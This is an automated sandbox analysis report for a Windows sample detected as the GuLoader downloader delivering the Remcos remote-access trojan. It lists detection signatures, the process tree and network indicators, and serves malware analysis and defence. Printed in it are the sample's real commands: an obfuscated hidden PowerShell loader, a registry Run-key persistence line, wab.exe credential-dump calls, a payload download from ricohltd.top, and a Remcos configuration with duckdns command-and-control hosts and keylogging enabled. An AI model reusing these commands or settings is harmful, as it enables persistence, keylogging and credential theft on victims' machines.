Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z14Novospedidosdecompra_Profil_4903.exe

Overview

General Information

Sample name:z14Novospedidosdecompra_Profil_4903.exe
Analysis ID:1428880
MD5:0e1262a4ce5ac71ad5b8df93030d61b5
SHA1:efb918ee62ff5cca7bdc10d180c7f7837c8e2b6b
SHA256:a90c7b4223bca6a28296894c66845de8fb61e7028b9c45ab8e0ec7d27db0bf71
Tags:exe
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • z14Novospedidosdecompra_Profil_4903.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe" MD5: 0E1262A4CE5AC71AD5B8DF93030D61B5)
    • powershell.exe (PID: 6452 cmdline: "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7192 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 7812 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • cmd.exe (PID: 7864 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7912 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wab.exe (PID: 8104 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8112 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8120 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hdqrgswaarisauuvaipksos" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8148 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jfwcglgtwzafkaizktcddtnovi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\mqerms.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000001.00000002.2405665204.0000000009F4C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 2 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7812, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)", ProcessId: 7864, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7864, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)", ProcessId: 7912, ProcessName: reg.exe
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6452, TargetFilename: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe
              Sigma detected: Potential Dosfuscation Activity
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7192, ProcessName: cmd.exe
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7812, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)", ProcessId: 7864, ProcessName: cmd.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)", CommandLine: "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe", ParentImage: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe, ParentProcessId: 6864, ParentProcessName: z14Novospedidosdecompra_Profil_4903.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)", ProcessId: 6452, ProcessName: powershell.exe

              Snort Signatures

              Timestamp:04/19/24-19:12:11.492624
              SID:2032777
              Source Port:29871
              Destination Port:49738
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/19/24-19:12:11.262632
              SID:2032776
              Source Port:49738
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Found malware configuration
              Source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exeReversingLabs: Detection: 57%
              Multi AV Scanner detection for submitted file
              Source: z14Novospedidosdecompra_Profil_4903.exeReversingLabs: Detection: 57%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7812, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: z14Novospedidosdecompra_Profil_4903.exeJoe Sandbox ML: detected
              Source: z14Novospedidosdecompra_Profil_4903.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.60.38:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: z14Novospedidosdecompra_Profil_4903.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: stem.Core.pdb_K source: powershell.exe, 00000001.00000002.2404825141.0000000008A40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2393081207.0000000003286000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2404825141.0000000008A5F000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\skabiose\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49738 -> 193.222.96.21:29871
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 193.222.96.21:29871 -> 192.168.2.4:49738
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: learfo55ozj01.duckdns.org
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 193.222.96.21 ports 29871,1,2,7,8,9
              Uses dynamic DNS services
              Source: unknownDNS query: name: learfo55ozj01.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.4:49738 -> 193.222.96.21:29871
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewIP Address: 193.222.96.21 193.222.96.21
              Source: Joe Sandbox ViewASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /PIoDroeALMbPB243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /PIoDroeALMbPB243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 00000007.00000002.2954637411.00000000255E0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.2955047654.0000000025DC0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.2955047654.0000000025DC0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: ricohltd.top
              Source: wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp09
              Source: wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpE
              Source: wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpd
              Source: wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpg
              Source: wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpi
              Source: wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpr
              Source: wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpz
              Source: z14Novospedidosdecompra_Profil_4903.exe, 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp, z14Novospedidosdecompra_Profil_4903.exe, 00000000.00000000.1666780592.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.2394581791.0000000005061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exeString found in binary or memory: http://www.ebuddy.com
              Source: wab.exeString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000007.00000002.2954637411.00000000255E0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
